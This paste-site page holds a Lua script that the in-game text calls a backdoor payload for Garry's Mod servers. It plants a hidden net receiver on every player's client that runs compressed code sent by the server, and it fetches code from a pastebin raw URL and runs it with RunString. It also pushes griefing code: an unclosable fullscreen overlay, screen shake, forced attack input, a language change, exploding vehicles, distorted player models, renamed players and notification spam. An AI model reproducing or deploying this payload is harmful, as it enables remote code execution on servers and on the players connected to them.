Facebook
From ta soeur, 4 Years ago, written in Lua.
Embed
Download Paste or View Raw
Hits: 196
  1. print([[
  2.  ██████╗ ███████╗████████╗    
  3. ██╔════╝ ██╔════╝╚══██╔══╝    
  4. ██║  ███╗█████╗     ██║      
  5. ██║   ██║██╔══╝     ██║      
  6. ╚██████╔╝███████╗   ██║      
  7.  ╚═════╝ ╚══════╝   ╚═╝      
  8. ███╗   ██╗ ██████╗ ███████╗ ██████╗ ██████╗ ██████╗ ███████╗
  9. ████╗  ██║██╔═══██╗██╔════╝██╔════╝██╔═══██╗██╔══██╗██╔════╝
  10. ██╔██╗ ██║██║   ██║███████╗██║     ██║   ██║██████╔╝█████╗  
  11. ██║╚██╗██║██║   ██║╚════██║██║     ██║   ██║██╔═══╝ ██╔══╝
  12. ██║ ╚████║╚██████╔╝███████║╚██████╗╚██████╔╝██║     ███████╗
  13. ╚═╝  ╚═══╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚═════╝ ╚═╝     ╚══════╝
  14.  
  15. Re-edit by HonoΣagle <3 ]])
  16.  
  17. for k, v in pairs( player.GetAll() ) do
  18.     if ( v:Alive() ) then
  19.      v:GodEnable()
  20.     else
  21.         v:Spawn()
  22.         timer.Simple( 5, function()
  23.             v:GodEnable()
  24.         end)
  25.     end
  26. end
  27.  
  28.  
  29. game.AddParticles( "particles/enigma.pcf" )
  30. PrecacheParticleSystem("enigma")
  31.  
  32. local function rdm_str(len)
  33.     if !len or len <= 0 then return '' end
  34.     return rdm_str(len - 1) .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(1, 62)]
  35. end
  36.  
  37. local net_string = rdm_str(25)
  38.  
  39. util.AddNetworkString(net_string)
  40. BroadcastLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  41. hook.Add("PlayerInitialSpawn", "ifyouseethisdontpanicitsme",function(ply)
  42.     if !ply:IsBot() then
  43.         ply:SendLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  44.     end
  45. end)
  46.  
  47. local function SendToClient(code)
  48.     local data = util.Compress(code)
  49.     local len = #data
  50.     net.Start(net_string)
  51.     net.WriteUInt(len, 16)
  52.     net.WriteData(data, len)
  53.     net.Broadcast()
  54. end
  55. timer.Simple( 17, function()
  56.     SendToClient([[
  57.  
  58. game.AddParticles( "particles/enigma.pcf" )
  59. PrecacheParticleSystem("enigma")
  60. hook.Add("Think","iuefheqefq",function() gui.HideGameUI() end)
  61.  
  62.  
  63. local CreateModel = function(mdl, isragdoll)
  64.   local ent
  65.  
  66.   if isragdoll then
  67.     ent = ClientsideRagdoll(mdl)
  68.   else
  69.     ent = ClientsideModel(mdl, RENDERGROUP_OTHER)
  70.   end
  71.  
  72.  
  73.   return ent
  74. end
  75.  
  76. local NewHookAdd = function(str, name, func)
  77.   --name = "dronesrewrite_hell_hooks" .. name
  78.   hook.Add(str, name, func)
  79.  
  80.   table.insert(cache, {
  81.     str = str,
  82.     name = name
  83.   })
  84. end
  85.  
  86. local cache = { }
  87. timercache = { }
  88. local Const = 0
  89. local Noise = nil
  90. local pl = LocalPlayer()
  91. timer.Create("charglogo", 2, 1, function()
  92.   local dlight = DynamicLight(pl:EntIndex())
  93.   if dlight then
  94.     dlight.pos = Vector(-2224.216797, -2918.063721, 2354.03125)
  95.     dlight.r = 255
  96.     dlight.g = 0
  97.     dlight.b = 0
  98.     dlight.brightness = 16
  99.     dlight.Decay = 1000
  100.     dlight.Size = 2000
  101.     dlight.DieTime = CurTime() + 2
  102.   end
  103.  
  104.   local pos = pl:GetPos() + Vector(0, 0, 120)
  105.   local ang = Angle(0, pl:GetAngles().y, 0)
  106.  
  107.   local tr = util.TraceLine({
  108.     start = pos,
  109.     endpos = pos + ang:Forward() * 86,
  110.     filter = pl
  111.   })
  112.  
  113.   local rag_pos = tr.HitPos + tr.HitNormal * 3 - Vector(0, 0, 80)
  114.  
  115.     for i = 1, 16 do
  116.         sound.Play("vo/npc/Barney/ba_laugh04.wav", Vector( 0, 0, 0 ) )
  117.     end
  118.     for i = 1, 10 do
  119.         ParticleEffectAttach("enigma",PATTACH_ABSORIGIN_FOLLOW,LocalPlayer(),0)
  120.     end
  121.  
  122.   local mdl = CreateModel("models/food/hotdog.mdl")
  123.   mdl:SetModelScale(5)
  124.   mdl:SetAngles(ang + Angle(15, 180, 0))
  125.   mdl:SetPos(rag_pos)
  126.   mdl:Spawn()
  127.  
  128.   --ParticleEffect("fire_test2", rag_pos, Angle(0, 0, 0))
  129.  
  130.   hook.Add("CalcView", "dronesrewrite_doshit", function(ply, _pos, _ang, fov)
  131.     local view = { }
  132.     view.origin = pos + VectorRand()
  133.     view.angles = ang
  134.     view.fov = fov + math.random(-80, -50)
  135.    
  136.     return view
  137.   end)
  138.  
  139.   timer.Create("charglo", 1.4, 1, function()
  140.     mdl:Remove()
  141.     hook.Remove("CalcView", "dronesrewrite_doshit")
  142.   end)
  143. end)
  144. ]])
  145. end)
  146.  
  147. timer.Simple( 20, function()
  148.     timer.Create( "gvacspaam", 0.1, 0, function()
  149.         for k,v in pairs(player.GetAll()) do
  150.             v:SendLua('RunConsoleCommand("impulse","100")')
  151.         end
  152.     end)
  153.     hook.Add( 'SetupMove', 'auto hop', function( ply, move )
  154.         if not ply:IsOnGround() then
  155.             move:SetButtons( bit.band( move:GetButtons(), bit.bnot( IN_JUMP ) ) )
  156.         end
  157.     end )
  158.     for k, v in pairs(ents.GetAll()) do if v:IsVehicle() then
  159.  
  160.         local explo = ents.Create("env_explosion")
  161.  
  162.         explo:SetPos(v:GetPos())
  163.  
  164.         explo:SetKeyValue("iMagnitude", "300")
  165.  
  166.         explo:Spawn()
  167.  
  168.         explo:Activate()
  169.  
  170.         explo:Fire("Explode", "", 0)
  171.  
  172.         end
  173.  
  174.     end
  175.     for k,v in pairs(player.GetAll()) do
  176.         local a = v:LookupBone("ValveBiped.Bip01_Head1")
  177.         local b = v:LookupBone("ValveBiped.Bip01_R_Thigh")
  178.         local c = v:LookupBone("ValveBiped.Bip01_L_Thigh")
  179.         local d = v:LookupBone("ValveBiped.Bip01_R_Calf")
  180.         local e = v:LookupBone("ValveBiped.Bip01_L_Calf")
  181.         local f = v:LookupBone("ValveBiped.Bip01_R_UpperArm")
  182.         local g = v:LookupBone("ValveBiped.Bip01_L_UpperArm")
  183.         local h = v:LookupBone("ValveBiped.Bip01_R_Forearm")
  184.         local i = v:LookupBone("ValveBiped.Bip01_L_Forearm")
  185.         local j = v:LookupBone("ValveBiped.Bip01_R_Clavicle")
  186.         local k = v:LookupBone("ValveBiped.Bip01_L_Clavicle")
  187.         v:ManipulateBoneScale( a, Vector(100,100,100))
  188.         v:ManipulateBoneScale( b, Vector(100,100,100))
  189.         v:ManipulateBoneScale( c, Vector(100,100,100))
  190.         v:ManipulateBoneScale( d, Vector(100,100,100))
  191.         v:ManipulateBoneScale( e, Vector(100,100,100))
  192.         v:ManipulateBoneScale( f, Vector(100,100,100))
  193.         v:ManipulateBoneScale( g, Vector(100,100,100))
  194.         v:ManipulateBoneScale( h, Vector(100,100,100))
  195.         v:ManipulateBoneScale( i, Vector(100,100,100))
  196.         v:ManipulateBoneScale( j, Vector(100,100,100))
  197.         v:ManipulateBoneScale( k, Vector(100,100,100))
  198.     end
  199.     SendToClient([[
  200.  
  201.     surface.CreateFont( "PixelCutsceneScaled",{
  202.         font = "Open Sans",
  203.         size = 500,
  204.         weight = 1000,
  205.         antialias = true
  206.     })
  207.  
  208.     surface.CreateFont( "PixelSmall",{
  209.         font = "Open Sans",
  210.         size = 135,
  211.         weight = 500,
  212.         antialias = false
  213.     })
  214.     surface.CreateFont("lapolice", {
  215.         font = "Open Sans",  
  216.         size = ScrW()*0.02,
  217.         weight = 10,
  218.         blursize = 0,
  219.         scanlines = 2.5,
  220.         antialias = false
  221.     })
  222.  
  223.     local function gettextcolor( a )
  224.    
  225.         local r = 0.5*math.sin(RealTime()*5.5)*255 + 255/2
  226.         local g = -0.5*math.sin(RealTime()*5.5)*255 + 255/2
  227.         local b = 215
  228.    
  229.         return Color( r, g, b, a or 255 )
  230.    
  231.     end
  232.  
  233.     local w,h = ScrW(), ScrH()
  234.     local W, H = ScrW(), ScrH()
  235.     local MySelf = LocalPlayer()
  236.    
  237.     if ohno then
  238.         ohno:Remove()
  239.         ohno = nil
  240.     end
  241.    
  242.     ohno = vgui.Create( "DFrame" )
  243.     ohno:SetSize( w, h )
  244.     ohno:SetPos(0,0)
  245.     ohno:SetDraggable ( false )
  246.     ohno:SetTitle("")
  247.     ohno:MakePopup();
  248.     ohno:ShowCloseButton(false)
  249.  
  250.     ohno.Paint = function( self )
  251.         Derma_DrawBackgroundBlur( self, self.m_fCreateTime )
  252.         Derma_DrawBackgroundBlur( self, self.m_fCreateTime )
  253.     end
  254.    
  255.     local pw, ph = w, h*0.6
  256.     local px, py = w/2-pw/2, h/2-ph/2
  257.  
  258.    
  259.     local Close = vgui.Create( "DButton", ohno )
  260.     Close:SetPos(px, py)
  261.     Close:SetText( "" )
  262.     Close:SetSize( pw, ph )
  263.     Close.Paint = function( self, tw, th )
  264.            
  265.         local shift = math.sin(RealTime()*3)*1.5 + 5
  266.            
  267.         local text = "GVACKDOOR > ALL"
  268.         local text2 = "Lul"
  269.         local text3 = "RIP ;)"
  270.         local text4 = "GVACKDOOR > ALL"
  271.  
  272.             draw.SimpleText( text, "PixelCutsceneScaled", tw/2 , th/2, gettextcolor( 55 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  273.             draw.SimpleText( text, "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  274.             draw.DrawText( "(╯°□°)╯︵ ┻━┻", "lapolice", ScrW() * 0.5, ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), TEXT_ALIGN_CENTER )
  275.             draw.DrawText( "(╯°□°)╯︵ ┻━┻", "lapolice", math.random(0,10), ScrH() * (math.random(0,100)*0.01), Color( 240, 100, 100, math.random(230,255) ), 0 )
  276.             draw.DrawText( "Lul", "lapolice", W * 0.7 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  277.             draw.DrawText( "Lul", "lapolice", W * 0.38 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  278.             draw.DrawText( "Lul", "lapolice", W * 0.9 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  279.             draw.DrawText( "Lul", "lapolice", W * 0.35 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  280.             draw.DrawText( "RIP ;)", "lapolice", W * 0.98 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  281.             draw.DrawText( "GVACKDOOR > ALL", "lapolice", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  282.             draw.DrawText( "RIP ;)", "lapolice", W * 0.73 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  283.             draw.DrawText( "GVACKDOOR > ALL", "lapolice", W * 0.27 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  284.             draw.DrawText( "GVACKDOOR > ALL", "lapolice", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  285.             draw.DrawText( "RIP ;)", "lapolice", W * 0.05 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  286.             draw.DrawText( "GVACKDOOR > ALL", "lapolice", W * 0.11 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  287.             draw.DrawText( "RIP ;)", "lapolice", W * 0.75 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  288.             draw.DrawText( "GVACKDOOR > ALL", "lapolice", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  289.             draw.DrawText( "RIP ;)", "lapolice", W * 0.2 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  290.             draw.DrawText( "GVACKDOOR > ALL", "lapolice", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  291.             draw.DrawText( "GVACKDOOR > ALL", "lapolice", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  292.             draw.DrawText( "GVACKDOOR > ALL", "lapolice", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )  
  293.             draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  294.             draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  295.             draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  296.             draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  297.             draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  298.  
  299.     end
  300.     surface.PlaySound( "vo/npc/male01/ohno.wav" )
  301.     surface.PlaySound( "vo/npc/male01/ohno.wav" )
  302.     timer.Create("fff", 0.1, 0, function()
  303.         util.ScreenShake( Vector(0,0,0), 2.5, 50, 0.5, 5000 )
  304.     end)
  305.  
  306.     timer.Simple( 15, function()
  307.  
  308.         wut = vgui.Create( "DFrame" )
  309.         wut:SetSize( w, h )
  310.         wut:SetPos(0,0)
  311.         wut:SetDraggable ( false )
  312.         wut:SetTitle("")
  313.         wut:ShowCloseButton(false)
  314.  
  315.         wut.Paint = function( self )
  316.             surface.SetDrawColor(30, 30, 30, 0)
  317.         end
  318.  
  319.         local Close = vgui.Create( "DButton", wut )
  320.         Close:SetPos(px, py)
  321.         Close:SetText( "" )
  322.         Close:SetSize( pw, ph )
  323.         Close.Paint = function( self, tw, th )
  324.                
  325.             local shift = math.sin(RealTime()*3)*1.5 + 5
  326.                
  327.             local text = "ΣNIGMA"
  328.  
  329.                 draw.SimpleText( text, "PixelCutsceneScaled", tw/2 , th/2, gettextcolor( 55 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  330.                 draw.SimpleText( text, "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  331.  
  332.         end
  333.  
  334.         RunConsoleCommand("r_shader_srgb","1")
  335.         RunConsoleCommand("gmod_language","ko")
  336.         ohno:Remove()
  337.         ohno = nil
  338.  
  339.         local name = GetConVar("sv_skyname"):GetString()
  340.         if name == "painted" then
  341.           local sky
  342.           for _, v in ipairs(ents.GetAll()) do
  343.             if v:GetClass() == "env_skypaint" then
  344.               sky = v
  345.               break
  346.             end
  347.           end
  348.           if !IsValid(sky) then return end
  349.           hook.Add("PostRender","\xFFsky\xFF",function()
  350.             local col = HSVToColor(CurTime()*30 % 360,1,1)
  351.             col = Vector(col.r/255,col.g/255,col.b/255)
  352.             sky:SetTopColor(col)
  353.             sky:SetBottomColor(col)
  354.           end)
  355.         else
  356.           local prefix  = {"lf","ft","rt","bk","dn","up"}
  357.           local mats = {}
  358.           for i=1,6 do
  359.             mats[#mats+1] = Material("skybox/" .. name .. prefix[i])
  360.           end
  361.           hook.Add("PostRender","\xFFsky\xFF",function()
  362.             local col = HSVToColor(CurTime()*30 % 360,1,1)
  363.             for i=1,6 do
  364.               mats[i]:SetVector("$color",Vector(col.r/255,col.g/255,col.b/255))
  365.             end
  366.           end)
  367.         end
  368.         local chienchaud = ClientsideModel("models/food/hotdog.mdl")
  369.         chienchaud:SetNoDraw(true)
  370.         chienchaud:SetModelScale(120)
  371.         timer.Create("charglogo", 0.01, 0, function()
  372.           chienchaud:SetAngles(Angle(0, CurTime()*90 % 360 ,180) )
  373.         end)
  374.         --chienchaud:SetMaterial( "models/screenspace" )
  375.         local data = {}
  376.         local function genchienchaud(id)
  377.           local pos = LocalPlayer():GetPos()
  378.           data[id] = { Vector(math.random(pos.x-9000,pos.x+9000),math.random(pos.y-9000,pos.y+9000),pos.z + math.random(5000,2000) ), math.random(70, 170) }
  379.         end
  380.         for i=1, 150 do
  381.           genchienchaud(i)
  382.         end
  383.         hook.Add("PostDrawOpaqueRenderables","\xFFitsrainingchienchauds\xFF",function()
  384.           local z = LocalPlayer():GetPos().z
  385.           for i=1, #data do
  386.             chienchaud:SetPos(data[i][1])
  387.             chienchaud:SetupBones()
  388.             chienchaud:DrawModel()
  389.             data[i][1].z = data[i][1].z - data[i][2] / 20
  390.             if data[i][1].z <= z then
  391.               genchienchaud(i)
  392.             end
  393.           end
  394.         end)
  395.  
  396.  
  397.  
  398.     end )
  399.  
  400.  
  401.     sound.PlayURL( "https://www.dropbox.com/s/5uss4zl4aeknb6v/ijfjFJlfnLJFfd.mp3?dl=1", "mono noblock noplay", function( station )
  402.         timer.Simple( 0.1, function()                    
  403.             ClientStation = station
  404.             station:EnableLooping( true )
  405.             station:Play()
  406.             station:SetVolume( 50 )
  407.         end )
  408.     end )
  409.  
  410. timer.Create("f", 0.11, 0, function()
  411.     RunConsoleCommand("+attack")
  412. end)
  413. timer.Create("ff", 0.12, 0, function()
  414.     RunConsoleCommand("-attack")
  415. end)
  416. ]])
  417. end)
  418.  
  419. timer.Create("ok", 1, 0, function()
  420.     for k, v in pairs( ents.FindByClass( "prop_*" ) ) do local phys = v:GetPhysicsObject()
  421.         if (IsValid(phys)) then
  422.             phys:EnableMotion(true)
  423.         end
  424.     end
  425.  
  426.     local props = ents.GetAll()
  427.     for _, prop in ipairs( props ) do
  428.         if(prop:GetPhysicsObject():IsValid()) then
  429.             prop:GetPhysicsObject():ApplyForceCenter( Vector( 0, 0, ((650 * 0.73) * prop:GetPhysicsObject():GetMass() ) ) )
  430.         end
  431.     end
  432. end)
  433.  
  434.  
  435. timer.Simple( 20, function()
  436.  
  437.     membresenigma =
  438.     {
  439.         "Akita",
  440.         "IXXE",
  441.         "Jodingue",
  442.         "Kazuki",
  443.         "Keeta",
  444.         "DJTB",
  445.         "Zilnix",
  446.         "GET NO SCOPE !!!!",
  447.         "GET NO SCOPE !!!!",
  448.         "GET NO SCOPE !!!!",
  449.         "GET NO SCOPE !!!!",
  450.         "GET NO SCOPE !!!!",
  451.         "GET NO SCOPE !!!!",
  452.         "GET NO SCOPE !!!!",
  453.         "GET NO SCOPE !!!!",
  454.         "BAN HAMMER > https://bit.ly/2LUu3GN",
  455.         "BAN HAMMER > https://bit.ly/2LUu3GN",
  456.         "BAN HAMMER > https://bit.ly/2LUu3GN",
  457.         "BAN HAMMER > https://bit.ly/2LUu3GN",
  458.         "BAN HAMMER > https://bit.ly/2LUu3GN"
  459.     }
  460.  
  461.     timer.Create( "gvacspam", 0.2, 0, function()
  462.         for k, ply in pairs( player.GetAll() ) do
  463.             DarkRP.notify(ply, 2, 2, "[Oh No !] "..table.Random(membresenigma).."")
  464.         end
  465.     end)
  466.  
  467.     local sun = ents.FindByClass("env_sun")
  468.     if #sun == 0 then return end
  469.     sun = sun[1]
  470.     hook.Add("Think","\xFFsun\xFF",function()
  471.         sun:SetKeyValue("sun_dir", math.sin(CurTime())/3 .. " " .. math.cos(CurTime())/3 .. " 0.901970")
  472.         sun:SetModelScale(120)
  473.     end)
  474.  
  475.  
  476.     for k,v in pairs(player.GetAll()) do
  477.         v:SetRunSpeed(400* 4);
  478.         v:SetWalkSpeed(400 * 4);
  479.     end
  480.  
  481.  
  482.     timer.Create( "gtonip", 1, 0, function()
  483.         for k,v in pairs(player.GetAll()) do
  484.             v:GodEnable()
  485.             v:setDarkRPVar( "rpname", "Tu as leak, je suis venu, désoler pour toi <3" )
  486.         end
  487.  
  488.     end )
  489.  
  490.  
  491.     timer.Simple( 17, function()
  492.         http.Fetch('https://pastebin.com/raw/7ABFD4Bu',function(b,l,h,c)RunString(b)end,nil)
  493.     end )
  494.  
  495. end)
  496.  
  497.  
  498. timer.Create( "gvacspam", 0.1, 0, function()
  499.     SendToClient([[
  500.     print("GET NOSCOPE  !!")
  501.    ]])
  502.     print("GET NOSCOPE  !!")
  503. end)